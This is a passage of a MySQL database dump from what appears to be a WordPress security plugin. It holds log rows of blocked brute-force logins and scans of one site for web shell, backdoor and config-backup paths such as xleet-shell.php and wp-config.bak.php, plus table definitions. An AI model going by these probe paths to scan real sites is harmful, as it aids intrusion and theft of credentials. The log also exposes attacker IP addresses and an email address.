212.221',351524061,'',0,1665722476.8361,55,'VjrlGRbOS5zMn9JY3Bf1H4vd','','19|0|0|0|cteisys.com/adminer-4.6.0.php',0,19,0),('20.243.212.221',351524061,'',0,1665722477.6034,55,'3iD7IM0mWkGUOfBKQYLRZlVE','','19|0|0|0|cteisys.com/adminer-4.6.1.php',0,19,0),('20.243.212.221',351524061,'',0,1665722478.3377,55,'NGFlLQEBvXYojVp2aZfwnzhR','','19|0|0|0|cteisys.com/adminer-4.6.2.php',0,19,0),('192.227.155.193',3236142017,'newd',0,1665722576.5549,7,'A5ayf0s9tHDdbPWlOSpen2iN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.13.81.56',856510776,'demo',0,1665722627.3904,152,'jD1pGextWRynm3AiwoTc92SU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'patricia',0,1665722627.4138,152,'JGhxZ25BEARd7CFqaY4mOuNP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('49.12.114.46',822899246,'left_blank',0,1665722636.5417,152,'VYtXQjyPxqWAwLZ8bzGDNCUk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('2.59.119.2',37451522,'2anatoma',0,1665722640.4623,152,'c98kzJrmAD3U6BgnLuRbEedi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'test',0,1665722645.8066,152,'xEbRXnIK4Ww9lz17JStshBPT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('183.90.250.15',3076192783,'admin',0,1665722645.9745,152,'Ftemdj3KzHiNWYERbU5ucO6S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.130.229.130',763553154,'jake',0,1665722657.7812,152,'umIazKlwpq8nF0ORyhXkts2Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'author',0,1665722661.2972,152,'WcrSl1wTEOhZqzoUH8CmdJ0L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('136.144.251.177',2291202993,'info',0,1665722668.1028,152,'EF26UJZ7MR9pyndzisLgXNkc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'test',0,1665722689.9746,152,'htg9yjDGTVmRsqkwBQEpCdIK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.120.53',3451484213,'Joyce',0,1665723248.3545,51,'zjrgfZ048uXoamHEhOY95ySi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.78.79.85',2035175253,'david',0,1665723941.5607,152,'9WZaD2HznPjSkwAyei0gUplb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'kiki',0,1665723941.7006,152,'MtyPgvEFKwaszcqd9n2ufmTY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.202.169.54',600484150,'Admin',0,1665723941.7008,152,'ic3pUV8jf7RdoDB15uYO6qAL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.207.190',860868542,'admin',0,1665729776.4044,152,'fwJ1L5EvcDAHNdxPmzBq82KM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.151.70.28',1536640540,'admin',0,1665729797.8053,152,'L0tFUkwMyW86gxDesC2VZqmS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.155.93.241',1738235377,'admin',0,1665729907.3971,152,'YHRB7VGEjoWcSMCe4am2s6uw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.88.73.86',3495446870,'matraca',0,1665729907.9818,152,'Mrb7ZRJYvka4gselUFxW120E','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.13.81.56',856510776,'admin',0,1665729931.2662,152,'C5N1xQSwhiJqXIfsLG72graO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.212.229.33',2111104289,'martin',0,1665729931.2663,152,'OycHIm3QUf2CsRxWztD48Vbo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'admin',0,1665730261.9862,152,'ElQ2PnLzJhoXv3VyFjATG9fS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.255.174.93',1761586781,'admins',0,1665730261.9881,152,'SCv8jKqV649GJPyxZircQUIa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.127.114',2335932274,'admin',0,1665730261.9877,152,'yXabslp7YQmwdToE45JOkKuR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.85.145',1386567057,'khayrollima@yahoo.com',0,1665730270.4435,152,'xWdyV8lZv7GOSoEtT4XgcY2w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('156.67.211.101',2621690725,'user',0,1665730272.2446,152,'gbKDhUZRC3O4F97smnATofp8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.222.89',2261900889,'admin',0,1665730288.1975,152,'mHecswRhQ6r1ETyng9xj4CKa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.207.190',860868542,'admin',0,1665730289.3711,152,'iuz4e6ICwM5GH1XdhOSAL3Qm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.128.32',1959428128,'Admin',0,1665730292.0035,152,'3yDzo6MVm0RsL7iJPjKbXrU5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.222.89',2261900889,'admini',0,1665730296.9343,152,'S5rOqkZ9IEbGiovhdyn6AYWK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'admin',0,1665730303.6927,152,'B7p1dj63TE0RrOSGcveH5XtN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.155.93.241',1738235377,'admin',0,1665730664.2677,152,'CXreYQhpaj1dI83H79NxR6gJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'admin',0,1665730664.2860,152,'J8AYTrEuhygtIxzsNXPademK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('206.72.195.89',3460875097,'admin',0,1665730664.3816,152,'l9X0WUk178bziFurYBtn4AEM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.85.145',1386567057,'admin',0,1665730672.5737,152,'ehlQTR6MXuAIBsjwWDJoCP3L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.142.146',1138658962,'admin',0,1665730678.6586,152,'nxbgrDsRlVjJt6wEOhcqdvpf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'admin',0,1665730681.2970,152,'bihRpI8JFq2x65wmBvUV0WQG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.59.164.178',3258688690,'123',0,1665730713.3553,152,'QZThdglrVHj2aWSCDB8f06EY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'admin',0,1665730713.7067,152,'24MGNv958BCgzWprIxUFAQyl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.105.239',1496213999,'admin',0,1665730714.0255,152,'2GcNw7st8JLfjz4dBu3OTAIC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.73.33.135',843653511,'Admin',0,1665730722.1413,152,'PCv3YcIhnSrbFlpqZtXWxkiN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.90.217',2707512025,'admin123',0,1665730944.4842,152,'WqG37zDnfV9xiavrUgRXd86B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.64.187.254',759217150,'username',0,1665730944.4887,152,'TcirVgQexd9XDzC723tN8hwU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.155.93.241',1738235377,'jsjobs_employer',0,1665730944.5192,152,'h8xg1Z30GLeoU5AVRONpPwHD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.158.228.157',3634291869,'agent',0,1665730969.4957,152,'eqlFpCyxLZw37hstdWYOoUkI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.63.148',2994749332,'admin',0,1665730969.4983,152,'hJlubTwY76FI1t3SHDgdfrBU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'test',0,1665730969.5052,152,'uzIHlGK2k605CmZDeMPShc9x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'Admin',0,1665730973.6830,152,'9izKgBFuZYqy1SATD7n2RbWU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.236.20.147',1475089555,'customer',0,1665730974.2589,152,'jMpCFb96KOeTrL5QPSIvZxAB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.60.66',1729838146,'alex',0,1665730980.6909,152,'EHwlVkK6udpASQecgmsq2x3v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.25.147.55',2014942007,'aaa',0,1665730983.9631,152,'n5e0aYkjNCD1QOdPTvfV4ZBl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.186.242.173',1572532909,'admin',0,1665730994.7409,152,'10FuDbAH8Y3UWiB5vhqPwcnX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.202.169.54',600484150,'test',0,1665731028.7968,152,'KkVhXNbJn7LxZaid6yeI1wQG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.221',3110826205,'test',0,1665731028.8400,152,'NvSMXxp4AIeuOKg3U1iQj0Bq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('183.90.250.15',3076192783,'kimelms',0,1665731028.8447,152,'zSr3E4soHT8JMnvyX9lPwK5p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.156.16.146',1385959570,'admin',0,1665731724.5319,152,'a2rT0zvCbQ5Mwu7jcx3RXsPe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.207.190',860868542,'aaa',0,1665731727.3990,152,'KmiCugsx6jQ4MaD3tl2V7Xwe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.105.95',2813094239,'newd',0,1665732176.5523,7,'VASTgRN12opawbi3kj0dmv4O','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.85',3583549781,'joyce',0,1665733407.2307,152,'5x6Njiv3sqAJOl82zcDouBFn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.154',3583550106,'joyce',0,1665733562.4042,152,'ehT3dKESwaYnbP8IjZHztvsJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.71.144.12',3225915404,'newd',0,1665733702.4762,7,'5sDfNAOnCvlmVxBZJW4zXapI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.195.254.123',3351510651,'Joyce',0,1665800730.1099,51,'mcE6afjRJ4dzBhF0M3WSCyLv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('168.138.27.184',2827623352,'',0,1665801028.9168,55,'d6n8ch5p4AVGaQMolITzRYry','','19|0|0|0|cteisys.com//wp-content/plugins/seoplugins/db.php',0,19,0),('168.138.27.184',2827623352,'',0,1665801028.9230,55,'31rpDNf6aMGuTHwPQqE8n5et','','19|0|0|0|cteisys.com//wp-content/themes/seotheme/db.php',0,19,0),('168.138.27.184',2827623352,'',0,1665801028.9239,55,'SLZNWXOQmbKfxwPM3l4Bo28v','','19|0|0|0|cteisys.com//wp-content/themes/pridmag/db.php',0,19,0),('178.162.204.238',2997013742,'joyce',0,1665801219.4402,152,'dDLTeQNbaZMqWlitKVrw6JGX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.252.31.179',3120308147,'newd',0,1665886843.6542,152,'irJODyCM6t35WjfIYcUN0zPX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1665887809.0482,152,'AvtUgsnSBHW78wPu2VELC5pl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1665887809.0812,152,'Y7LI12KBp9AcR3Uf0aE8PWNw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1665887874.1328,55,'qXcIt4jMWneJ5FbwQRZ1sCui','','19|0|0|0|cteisys.com/wp-content/themes/dp_evolve/js/back-end/libraries/fileuploader/upload_handler.php',0,19,0),('103.166.182.177',1738978993,'newd',0,1665888120.7178,152,'lIdeSr6vPnk2XW5s87N4g39y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.174.93',148024925,'newd',0,1665888120.9345,152,'ZKIPWw9DfMH5dv0e1C3BLmYF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.56.13',3515693069,'Joyce',0,1665888394.4115,51,'YDWOoc08BFxl6a3wG4US1epn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.162.204.238',2997013742,'Joyce',0,1665888395.1432,152,'sGF0TL7WhONJY6xMXe1ZPbjB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.117.143',3451483535,'Joyce',0,1665888589.5480,51,'G42V7vBDIkcUAK6fp15F8nuS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.169.30.9',3198754313,'newd',0,1665889140.5126,152,'VtrScm4ujhEbyJMITe2nBWiR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.169.30.9',3198754313,'newd',0,1665889140.5881,152,'jidIPx3uzgUKlZhvkqr5BW4M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.12',1520216332,'newd',0,1665889508.5399,152,'QHbjmy8PEDB5VoK2kAS6f7eX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.95.162',1701011362,'newd',0,1665889508.6070,152,'XfVa7ogOpStwMrNP5eYs3njT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.200.116.203',3116922059,'joyce',0,1665974212.0110,152,'LDTZfc3EoqOPy2vpnhVjMwCI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.63.80.162',775901346,'newd',0,1665974671.5778,7,'HohKBxRdFl0ETguz8fyPZraA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1665974720.9347,7,'km92MoGrdslwZvb3Vt0QqHec','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.95.112.79',2522837071,'newd',0,1666061284.2289,152,'QxM72izlt0BwecVZfHGWTqOU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.18.43',861606443,'newd',0,1666062795.5836,152,'LwyoBpPMtTzAJs8QVgjCdZ92','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.145.54.196',3515954884,'newd',0,1666066879.5651,152,'DzH0AoFg3TOXSEfWw2aictUb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.160.37.174',1738548654,'newd',0,1666067531.2534,152,'To6MfXzOiCENrbpx5KsygP3A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1666068182.6157,152,'0BgrdiI7syNuDh9nV2EYU8QS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.242.130',860877442,'newd',0,1666068461.0741,152,'rlx5tyLkPfBzECUG2jwN9O8d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1666068762.7969,152,'WvP9Y3JSKMsHZucy1zr5logG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.25.115.173',337212333,'',0,1666076364.9906,55,'epStvDHEFac94WGgPl3N5kwM','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('20.25.115.173',337212333,'',0,1666076480.9135,55,'jMXPQ23u6qKtsvBlJT7Dcb4Z','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('20.25.115.173',337212333,'',0,1666076510.4927,55,'51crAakqgQYLK8ZWlb9yi0oO','','19|0|0|0|cteisys.com/cindex.php',0,19,0),('20.25.115.173',337212333,'',0,1666076961.6481,55,'SwmDyINpK4XQz7HarqT82ngP','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('20.25.115.173',337212333,'',0,1666076975.9235,55,'ohdY3bMqCxW9E0f8DKsXAgHl','','19|0|0|0|cteisys.com/wp-content/plugins/config.bak.php',0,19,0),('20.25.115.173',337212333,'',0,1666076981.6495,18,'ZCEJKvyfBuRheTxFD9oAj7Qd','','13|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,13,0),('20.25.115.173',337212333,'',0,1666077012.4454,55,'IyRgNujcHSksX3qw1T9aOKr2','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('20.25.115.173',337212333,'',0,1666077016.9656,100,'7FusJdPO1hqWUktKmZg09bVl','','13|0|0|0|cteisys.com/wp-includes/wpconfig.bak.php',0,13,0),('20.25.115.173',337212333,'',0,1666077042.5160,100,'DJNz9PdeWEiArc0MjLSZFyXl','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.25.115.173',337212333,'',0,1666077046.2495,55,'UGgOHfMC73RkFhXrtd4DjqAy','','19|0|0|0|cteisys.com/haders.php',0,19,0),('20.25.115.173',337212333,'',0,1666077052.4819,100,'Wem8Fy2cEY4KGSZloMNwXBbr','','13|0|0|0|cteisys.com/wp-content/wp-old-index.php',0,13,0),('20.25.115.173',337212333,'',0,1666077063.0266,55,'BGPVvDAEs1ikXUx0Hf7LFZeS','','19|0|0|0|cteisys.com/legion.php',0,19,0),('20.25.115.173',337212333,'',0,1666077083.6290,55,'nrTQtLZiPuJW7b9pgANIDv84','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('20.25.115.173',337212333,'',0,1666077092.6959,55,'Tjorua85lZ9w1evRUmyOkSIP','','19|0|0|0|cteisys.com/wp-includes/lfx.php',0,19,0),('20.25.115.173',337212333,'',0,1666077098.1107,55,'lKB5pc1hPQXtL7bR8q6U4NZT','','19|0|0|0|cteisys.com/wp-includes/small.php',0,19,0),('87.249.38.253',1475946237,'',0,1666077144.3058,55,'9XZU2wx63evHdJyLIm7FE5tW','','19|0|0|0|cteisys.com/xleet-shell.php',0,19,0),('87.249.38.253',1475946237,'',0,1666077145.0910,55,'hTSycCIDgu27xo8Z1OLP59bJ','','19|0|0|0|cteisys.com/xleet.php',0,19,0),('87.249.38.253',1475946237,'',0,1666077146.7890,55,'7jcb6usgxiByQEOfaHYqCDAN','','19|0|0|0|cteisys.com/sh3llx.php',0,19,0),('87.249.38.253',1475946237,'',0,1666077146.8824,55,'0MAkasOpu8w2JxPcU56QETRt','','19|0|0|0|cteisys.com/takeout.php',0,19,0),('87.249.38.253',1475946237,'',0,1666077147.9014,55,'gD5hEjkBKzsbyqcFftaGSTUi','','19|0|0|0|cteisys.com/jindex.php',0,19,0),('87.249.38.253',1475946237,'',0,1666077147.9062,10,'gD5hEjkBKzsbyqcFftaGSTUi','','707|0|0|0|cteisys.com/jindex.php',0,707,0),('87.249.38.253',1475946237,'',0,1666077148.0085,55,'UvCe7KLBFio83QjT0PMSg5DI','','19|0|0|0|cteisys.com/admin.php',0,19,0),('87.249.38.253',1475946237,'',0,1666077148.0814,55,'aRoICVYj1uiyZWmwgJ2hHdkS','','19|0|0|0|cteisys.com/xlet.php',0,19,0),('87.249.38.253',1475946237,'',0,1666077148.1130,55,'rAPfIdk6FR9eZYLlbO04tXoB','','19|0|0|0|cteisys.com/xltavrat.php',0,19,0),('20.25.115.173',337212333,'',0,1666077219.8817,55,'rtylp9Z0PWshVdKJS4nkwXFN','','19|0|0|0|cteisys.com/up.php',0,19,0),('20.25.115.173',337212333,'',0,1666077369.1996,55,'YEC5QPyA9Jwt46kzZmbaIOoL','','19|0|0|0|cteisys.com/upload.php',0,19,0),('20.25.115.173',337212333,'',0,1666077474.8747,55,'CDfeQLgRuvE8AH9XjdoJhOBi','','19|0|0|0|cteisys.com/config.php',0,19,0),('20.25.115.173',337212333,'',0,1666077504.4243,100,'sfbpmYAgq75CHUJN1wjyid9O','','13|0|0|0|cteisys.com/test.php',0,13,0),('20.25.115.173',337212333,'',0,1666077558.7548,55,'8e3frjFi7toR0JMdTVqKbmLG','','19|0|0|0|cteisys.com/wp-content/langar.php',0,19,0),('20.25.115.173',337212333,'',0,1666077678.0465,55,'3xh2LlvgOjdGQkIYbDoETfNp','','19|0|0|0|cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',0,19,0),('171.244.17.110',2884899182,'newd',0,1666077939.8300,152,'bK08n9fH5uyokGsicpUrxQ4v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.164.193.195',3164914115,'newd',0,1666078318.9598,152,'G8CXL9Dg2HWJKBRberdN64O5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'newd',0,1666078669.9890,152,'nM9UrWhwGvm0jfDJcFX4uP3T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.145.54.196',3515954884,'newd',0,1666079756.2790,152,'IYf1qV0RgKO5FGnQBZA3yJpo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.33',3103917089,'newd',0,1666146082.5844,7,'yAswivX7u1hz5xZqtn0PBG2l','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.56.99.136',2453169032,'newd',0,1666148332.2072,7,'T6rNVJC8uE4B5DzFGkUqemQS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('135.125.183.202',2273163210,'',0,1666233340.3188,55,'wZWfhtcoK65linPQrDaCx1kE','','19|0|0|0|cteisys.com/wp-content/themes/pridmag/about.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233344.3253,55,'nVPuBq8N0kThcQvUtZMeom1b','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233348.0385,55,'42bW9IA6lidyarOBpZvKXuMY','','19|0|0|0|cteisys.com/years.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233351.8875,55,'DtFeyXKvnb2RMz8oJ5fk7HOT','','19|0|0|0|cteisys.com/css/contents.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233355.5126,55,'O4Gw6iKgkScFZYH8uWC5fRdl','','19|0|0|0|cteisys.com/contents.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233355.5151,10,'O4Gw6iKgkScFZYH8uWC5fRdl','','707|0|0|0|cteisys.com/contents.php',0,707,0),('135.125.183.202',2273163210,'',0,1666233359.3599,55,'i4TgYL2kB76ashnUAM3ZcE5K','','19|0|0|0|cteisys.com/css/load.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233363.6744,55,'kEsmGi3NaOpxlZeVU6HTMdnt','','19|0|0|0|cteisys.com/votes.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233369.2708,55,'x5Ohi7tWsFVdHUC4P3o8yv9I','','19|0|0|0|cteisys.com/2index.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233373.3026,55,'m2yl8TCB0VjzLFPSf9o3HtUw','','19|0|0|0|cteisys.com/1index.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233377.5701,55,'9u7kMaNpXbO1zHfWdgUyAQ3t','','19|0|0|0|cteisys.com/load.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233381.7040,55,'g3PqsZBuRJzVxUchYbfD1C8W','','19|0|0|0|cteisys.com/admin.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233385.2189,55,'PLvGgJTfkFzIV4tcBio25UmH','','19|0|0|0|cteisys.com/wikindex.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233389.0436,55,'9m7Cu0Zo5HJRWatQrOGnkUpY','','19|0|0|0|cteisys.com/css/votes.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233392.3578,55,'2dDAUuVk8lcJn1HQYING6ZP0','','19|0|0|0|cteisys.com/about.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233395.8678,55,'J4WuFEfPkQeoXNLqYwRGI0v5','','19|0|0|0|cteisys.com/radio.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233401.1465,55,'BhVcljpnFuydwR8X1oGxK7T3','','19|0|0|0|cteisys.com/wp-admin/js/widgets/radio.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233405.0497,55,'D7voq5IGVMJwkK3HjnPcreY0','','19|0|0|0|cteisys.com/wp-admin/css/colors/radio.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233408.8110,55,'nWpQZmtkbeNcPBV4ELiX78q5','','19|0|0|0|cteisys.com/wp-content/themes/classic/inc/admin.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233412.1073,55,'gidGVhKNBTHtao5wUIYWmqXx','','19|0|0|0|cteisys.com/wp-includes/rest-api/endpoints/radio.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233416.8825,55,'B10lcVFSEijgLMq9T2GZH3vR','','19|0|0|0|cteisys.com/wp-admin/wikindex.php',0,19,0),('135.125.183.202',2273163210,'',0,1666233421.3888,55,'Ii8ZVw1c9mbQqpC4tyk6X3Ph','','19|0|0|0|cteisys.com/wp-content/plugins/core-engine/admin.php',0,19,0),('89.248.165.195',1509467587,'newd',0,1666238104.0858,7,'rA073zwncWKJgIS6MymY8tGb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.248.165.195',1509467587,'newd',0,1666238110.1909,7,'hP48e3NVmHJ7Wk5sxBRqF2fr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.248.165.195',1509467587,'newd',0,1666238115.0240,7,'JI1bslCZdNqSKaMVyrnc2tGx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.248.165.195',1509467587,'newd',0,1666238121.3465,7,'BD4eYWQunoSq8fIaTLK2j1VE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.248.165.195',1509467587,'',0,1666238121.3502,10,'BD4eYWQunoSq8fIaTLK2j1VE','','701|0|0|0|cteisys.com/wp-login.php',0,701,0),('89.248.165.195',1509467587,'',0,1666238125.9437,50,'xFTQIRBbtjH0vqmXsEMSAOLo','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('202.29.236.140',3390958732,'newd',0,1666238979.8859,7,'o5fXdVrnkGKTsRz7YZJbj0Uv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.234.124',2806508156,'newd',0,1666240838.4189,7,'KISFnLZQGfzmTEXvoucgxjaP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0);
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_qmem`
--

DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
  `ip` varchar(39) CHARACTER SET ascii NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `stamp` int(10) unsigned NOT NULL,
  KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_qmem`
--

LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_traffic`
--

DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
  `ip` varchar(39) CHARACTER SET ascii NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `hostname` varchar(250) NOT NULL DEFAULT '',
  `uri` text NOT NULL,
  `request_fields` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `request_details` mediumtext NOT NULL,
  `session_id` char(32) CHARACTER SET ascii NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `processing` int(10) NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii NOT NULL DEFAULT '',
  `request_method` char(8) CHARACTER SET ascii NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `wp_type` int(10) unsigned NOT NULL DEFAULT 0,
  `is_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `blog_id` int(10) unsigned NOT NULL DEFAULT 0,
  `php_errors` text NOT NULL,
  `req_status` int(10) unsigned NOT NULL DEFAULT 0,
  KEY `stamp` (`stamp`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_traffic`
--

LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
